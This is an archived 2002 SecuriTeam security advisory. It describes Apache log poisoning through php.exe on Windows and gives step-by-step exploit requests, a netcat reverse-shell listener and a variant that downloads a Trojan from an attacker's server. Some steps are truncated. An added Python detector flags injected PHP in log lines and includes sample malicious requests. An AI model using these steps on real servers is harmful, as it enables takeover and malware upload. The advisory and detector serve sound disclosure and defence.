[NT] Gaining Root Access via PHP.exe

From: support@securiteam.com
Date: 01/23/02

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 23 Jan 2002 13:36:39 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Gaining Root Access via PHP.exe


A major security vulnerability has been found in PHP for Windows. It allows
an attacker to abuse PHP's ability to read files that reside outside the
normal HTML root directory in order to execute arbitrary code, by inserting
into the Apache log file a malicious PHP based


Vulnerable systems:
PHP version 4.0 with Apache Server version 2.0

Exploit (Executing a command):
Assume that Apache has been installed in "c:\apache" and that php.exe was
installed in its default path of "c:\php\php.exe". The steps to gain root
(on Windows this means the privileges of the account Apache runs under,
typically LocalSystem when Apache is installed as a service) are as follows:
In the browser, type the following:
1) http://www.example.com/('thecommandtoexecutewithpath');%20?>
Apache will add this request line to the access.log file. By requesting the
log file through the php.exe exploit you can then run the PHP system() call
like this:
This will run the PHP code mentioned above.
Root is gained by getting the web server to open a reverse telnet back to
your own machine, where netcat is listening with a command such as:
"nc -l -n -v -p "
As you can see, this is a very simple way to compromise the entire server
with the php.exe exploit.

Exploit (Uploading a file):
1) Create a text file on your web server called mytestfile.txt
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing
5) Check that the file exists on the server by typing
http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests (if the browser does not seem to
connect, do not worry, it is; do not press refresh at any step, otherwise
this will not work. Remember to replace the brackets on the first two
7) Make the request in your browser
http://www.example.com/("http://[YOUR_SERVER_IP]/mytestfile.txt"," rb");?>

8) Wait for about 10 Seconds
9) Make the request in your browser

10) Wait for about 10 Seconds
11) Make the request in your browser

12) Wait for about 10 Seconds
13) Make the request in your browser

14) Wait for about 10 Seconds
15) Make a request for a non-existent file (To flush the access log) by
16) Wait for about 10 seconds

17) Get php.exe to parse the apache logfile by typing

18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing in your browser

What happens is that php.exe runs the PHP code that has been logged in the
Apache log file. The code in the log file then tells the server to download
the file from your server and save it into the Apache directory.

The uploaded file can be a Trojan, an .exe, a .php file, etc. There is no
limitation on what you can upload, or where, beyond what the account
running Apache is allowed to write.

It is a very simple task to write a Trojan with CGI headers and to execute
it once uploaded.
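Both exploit variants above leave the same trace: PHP fragments in the
request line of access.log, followed shortly afterwards by a request that
makes php.exe parse that log. The script below is an added detection
example, not part of the advisory and not from SecuriTeam or the reporter;
it parses Apache common-format log lines, URL-decodes the request, flags
PHP open/close tags and dangerous calls (system, fopen, fwrite, ...), and
correlates several injections from one client IP within a time window with
a later php.exe request. The log lines it runs over are constructed for
illustration, and the assumption that the "parse the logfile" step appears
as a direct request to php.exe with a query string naming a file is mine,
not something the advisory states.

```python
"""Detect Apache log poisoning of the kind the advisory describes: PHP code
smuggled into the request line, then a request that makes php.exe parse the
log. Added example, not the advisory's own code; sample log is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Apache "common"/"combined" log prefix:
#   ip ident user [dd/Mon/yyyy:HH:MM:SS +zzzz] "request line" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>.*?)" (?P<status>\d{3})\b'
)

# Strings that have no business in a legitimate request line.
PHP_PATTERNS = [
    ("php_open_tag", re.compile(r"<\?(php|=)?", re.I)),
    ("php_close_tag", re.compile(r"\?>")),
    ("dangerous_call", re.compile(
        r"\b(system|exec|passthru|shell_exec|popen|fopen|fwrite|fread)\s*\(", re.I)),
]

# Heuristic (assumption, not stated in the advisory): the step that gets
# php.exe to parse the log is a direct request to php.exe with a query
# string naming a file.
PHPEXE_RE = re.compile(r"/php\.exe\?\S+", re.I)


def parse_line(line):
    """Split one access-log line into fields; None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    # Browsers encode spaces and quotes (%20, %22); match on the decoded form.
    entry["decoded"] = unquote(entry["request"])
    return entry


def classify(entry):
    """Return the indicator names found in the decoded request line."""
    findings = [name for name, rx in PHP_PATTERNS if rx.search(entry["decoded"])]
    if PHPEXE_RE.search(entry["decoded"]):
        findings.append("php_exe_with_query")
    return findings


def analyse(lines, window=timedelta(minutes=2)):
    """Group indicators per client IP and recognise the advisory's sequence:
    two or more injected fragments from one IP within `window`, followed by
    a php.exe request that would parse the poisoned log."""
    hits = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits[entry["ip"]].append((entry["time"], findings))

    report = {}
    for ip, events in hits.items():
        events.sort(key=lambda ev: ev[0])
        injections = [t for t, f in events if any(x != "php_exe_with_query" for x in f)]
        parses = [t for t, f in events if "php_exe_with_query" in f]
        report[ip] = {
            "injected_requests": len(injections),
            "php_exe_requests": len(parses),
            "staged": len(injections) >= 2 and injections[-1] - injections[0] <= window,
            "log_parsed_after_injection": bool(injections)
                and any(t > injections[0] for t in parses),
        }
    return report


# Constructed sample log (not from the advisory): one benign client and one
# attacker following the advisory's pattern; paths are illustrative only.
SAMPLE_LOG = r"""10.0.0.5 - - [23/Jan/2002:13:36:39 +0100] "GET /index.html HTTP/1.0" 200 1043
192.0.2.7 - - [23/Jan/2002:13:37:01 +0100] "GET /<?php%20system('cmd.exe%20/c%20dir');%20?> HTTP/1.0" 404 210
192.0.2.7 - - [23/Jan/2002:13:37:12 +0100] "GET /<?php%20$f=fopen(%22http://192.0.2.7/mytestfile.txt%22,%22rb%22);?> HTTP/1.0" 404 210
192.0.2.7 - - [23/Jan/2002:13:37:40 +0100] "GET /php/php.exe?c:\apache\logs\access.log HTTP/1.0" 200 5120
10.0.0.5 - - [23/Jan/2002:13:38:00 +0100] "GET /images/logo.gif HTTP/1.0" 200 2431
"""

if __name__ == "__main__":
    for ip, summary in analyse(SAMPLE_LOG.splitlines()).items():
        print(ip, summary)
```

Run it against a real access.log with `analyse(open(path).readlines())`.
The 404 status on the injected requests is typical: the request only needs
to be logged, not served, which is why a simple "only alert on 200" filter
misses this attack. Matching on the decoded request is essential because
the advisory's own payloads arrive with %20 in place of spaces.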


The information has been provided by
<mailto:brereton_paul@btopenworld.com> Paul Brereton.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.